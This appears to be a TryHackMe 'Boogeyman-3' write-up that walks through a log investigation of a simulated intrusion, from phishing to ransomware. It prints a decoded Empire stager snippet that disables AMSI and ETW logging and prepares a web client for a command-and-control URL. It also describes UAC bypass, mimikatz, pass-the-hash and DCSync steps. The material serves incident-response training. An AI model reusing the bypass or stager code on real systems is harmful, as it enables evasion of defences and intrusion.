TryHackMe: Boogeyman-3 Challenge
The Chaos Inside
Challenge Link:
Lurking in the Dark
Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.
The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.
Initial Investigation
Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.
In addition, the security team also observed a file inside the ISO payload, as shown in the image below.
Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.
Given the initial findings, you are tasked to analyse and assess the impact of the compromise.
Log Analysis:
Open Elastic, go to the Discover menu, and set the incident time.
Let’s first identify the usernames and hosts in the log:
Initial Access 2023-08-29 23:51:15:
The downloaded file is a .pdf extension.
on the hostname: WKSTN-0051.quicklogistics.org of the username:evan.hutchinson. The process mshta.exe stands for Microsoft HTML Application Host, and it is used to execute .hta files (HTML Applications), which can contain HTML + scripting (like JavaScript or VBScript). The process Explorer.EXE(2940) spawned mshta.exe (6392) process, which led to execute the .pdf file. Now that we know the process, filter the logs for mshta.exe process.
Execution:
The process mshta.exe spawned three process (xcopy.exe, rundll32.exe, powershell.exe).
- First process:
xcopy.exe, created a copy of a file namedreview.datfromD:\to theTempdirectory of the user Evan Hut. - second process:
rundll32.exe, executes a DLL function calledDllRegisterServerfrom the fileD:\review.dat. DllRegisterServer A standard function found in many DLLs used for self-registration (often writes to the registry).
Persistence 2023-08-29 23:51:16:
- Third process:
powershell.exe, execute a malicious persistence via scheduled tasks. This PowerShell command creates a scheduled task named “Review” that runs daily at 6:00 AM, executing a suspicious DLLreview.dat
Privilege Escalation & Defense Evasion 2023-08-29 23:54:49.213:
Investigate this review.dat file. We will see the attacker execute a few commands to view the compromised user’s information. At the end, the attacker executed fodhelper.exe which can be abused by attackers to bypass User Account Control UAC
Note in the last execution, the attacker attempted for lateral movement to WKSTN-1327 as allan.smith. Inspect the execution spawned by fodhelper.exe.
The process.pid: 7116, in the command-line, it reads a base64-encoded malicious script stored in the registry key and launches a second hidden PowerShell process, which decodes and executes that malicious script. Let’s see what this process spawns, search for ppid: 7116.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
If ($PSVersionTable.PSVersion.Major -ge 3) {
$Ref = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$Ref.GetField('amsiInitFailed', 'NonPublic,Static').SetValue($Null, $true)
[System.Diagnostics.Eventing.EventProvider]
.GetField('m_enabled', 'NonPublic,Instance')
.SetValue(
[Ref].Assembly
.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
.GetField('etwProvider', 'NonPublic,Static')
.GetValue($null),
0
)
}
[System.Net.ServicePointManager]::Expect100Continue = 0
$wc = New-Object System.Net.WebClient
# Set the User-Agent string to look like a browser
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
# Decode and build the URL
$ser = ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(
'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAccBhAHIAdAB5AC4AbgBlAHQAOgA4ADAA'
))) # http://cdn.bananapeelparty.net:80
$t = '/news.php'
# Set headers and make the request
$wc.Headers.Add('User-Agent', $u)
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
This payload connects to a malicious domain: http:[//]cdn.bananapeelparty.net:80/news.php, and uses custom proxy and credentials to hide the traffic or bypass some firewall rules.
Credential Access & Discovery:
Following the execution of the malicious payload. In the log, the attacker executed some commands for enumeration. He also used PowerSploit framework to use Invoke-ShareFinder and Get-DomainUser functions for enumeration purposes.
The attacker downloaded and executed the mimikatz tool for credentials dump, and he was able to pass the hash as the itadmin user. With the new user, the attacker accessed a file on a remote share named: IT_Automation.ps1
Lateral Movement & Command and Control 2023-08-30 00:19:52:
Using the discovered credentials from IT_Automation.ps1 file. This PowerShell command executes a remote command on a machine named WKSTN-1327 using stored credentials. Now he is moving from this host WKSTN-0051 to this host WKSTN-1327. Now he moved to the new host using allan.smith credentials, filter the log based on that. I filtered for -enc to see if there are any encoded commands executed on the new host
There is a command spawned by wsmprovhost.exe. After decoding, it looks like another Empire Stager was executed using the same method. The attacker also downloaded and executed the mimikatz tool on the second machine. This reveals the Domain Administrator and its hash.
Search for the execution of the second stager that ran on the username: allan.smith
This executes a command on a local or remote computer. -ScriptBlock {hostname}: The block of code to run remotely — in this case, it runs the hostname command,which returns the name of the computer. -ComputerName DC01.quicklogistics.org: Specifies the target computer — in this case, a Domain Controller (DC01) in the domain quicklogistics.org. To confirm the execution of the hostname command on the target computer, search for the HOSTNAME.exe process execution.
When filtered for wsmprovhost.exe. This confirms a remote execution on the DC01.
Filtering for the execution of the malicious payload executed on the DC01, we see the attacker download and execute mimikatz tool
This performs a DCSync attack, which tricks the Domain Controller into thinking the attacker is another DC, and requests replication data — including password hashes for the specified user (backupda).
Impact 2023-08-30 01:53:13:
After having full control of the domain quicklogistics.org, the attacker downloaded and executed a ransomboogey.exe file, as well as on both WKSTN-0051 and WKSTN-1327.
The execution of ransomboogey.exe process on the host WKSTN-1327 was by the useritadmin. But there was no execution of the malicious process on host WKSTN-0051.